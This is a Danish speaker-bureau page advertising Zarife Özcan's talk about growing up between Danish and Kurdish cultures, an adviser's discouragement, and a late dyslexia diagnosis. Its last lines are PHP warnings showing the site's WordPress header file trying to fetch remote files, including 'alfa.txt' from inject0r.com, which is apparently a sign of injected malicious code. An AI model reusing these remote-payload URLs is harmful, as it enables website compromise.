img-us
  • asc

    Foredragsholder Zarife Özcan

  • asc

    Emne Mønsterbryder med et ben i begge verdener

  • asc

    pris 10000.-

“Du ved ikke hvor stærk du er, indtil styrke er det eneste du har”

“Zarife du er dum, hvis du skifter skole. Så har du nemlig ingen chancer i livet for at tage en uddannelse.  Hvis du bliver på denne skole, så kan du måske tage en uddannelse på SOSU eller teknisk skole...”

Det var svaret jeg fik af min 7. klasse skolevejleder, da jeg sagde jeg ønskede at være kirurg og ønskede skifte skole.

Mit første drømmejob var at være hospitalsklovn. Et arbejde hvor jeg kunne redde mennesker ved brug af humor og latter. Senere, da jeg begynte i skole, blev mit drømmejob kirurg. Efter den samtale med min skolevejleder, mistede jeg fuldstændig håbet om at blive kirurg og hermed også drømmen. Den drøm blev nemlig knust i det sekund, og jeg kan huske, at jeg løb grædende ud vejlederens kontor.

Jeg anede ikke, at sætningen “Zarife du er dum” ville hjemsøge mig i mange år.

Den dag i dag,  er jeg færdiguddannet kandidat i pædagogisk antropologi og har over 16 års erfaringer med teaterskuespil, rollemodel, mentor, konflikthåndtering og dialogambassadør samt en uddannelse som ART-Træner (Aggression Replacement Training).Hvordan gik lille Zarife fra en følelse af, aldrig at være god nok, aldrig dansk nok, aldrig kurdisk nok, aldrig tynd nok, aldrig klog nok, aldrig sjov nok, til at være en inspiration og motivation for mennesker i at kæmpe mod ale odds, finde sit indre kompas i et multikulturel samfund og opnå sine livs drømme?

Hør Zarifes kamp om at finde sit fodsæste i et samfund, hvor alle forventer perfektion. Gennem Zarifes personlig historie, får I et indblik i “Den glemte generation”. Denne generation er dem, som ikke føler, de kan sættes i en boks. Det er dem, som lever i et parallelsamfund og bliver kriminelle. Dem, der går til ekstreme miljøer for at finde en identitet. Det er de unge piger, der lever under negativ social kontrol og forsætter den kulturelle opvækst, uden at udvikle sig i takt med samfundet, globalisering og individualisme.

Zarife har fundet formlen for den indre ro og leve i balance. Hun kommer med erfaringer og råd til unge og voksne i et finde sit drive i livet og leve i balance, uden alle andres forventninger. Hvor hun gennem personlige erfaringer kommer med råd til, hvordan hendes livshistorie har været en succes mht. til at afholde sig fra stigmatiseret grupper, holde sig på den rene sti og bane vejen for mange multietniske dansker i fremtiden.

Året før Zarife afsluttede sin kandidatgrad, fandt hun tilfældigvis ud af, at hun var ordblind. Hvordan kan en pige, som er født og opvokset i danmark, afsluttet folkeskole, 10.klasse, HF, pædagog seminariet og 1 år på universitet, uden én eneste fagperson har opdaget hendes skrive/læse vanskeligheder? Var det fordi hun var tosproget og man derfor ikke kunne forvente mere af hende?

Hvilken motivation, drive og dedikation har Zarife haft for ikke at give op?  Ingen drømme er for stor - og alle fortjener at opleve deres.


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Peter Sørensen

Jonas Larsen

Amalie Pedersen

Klaus Bondam


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22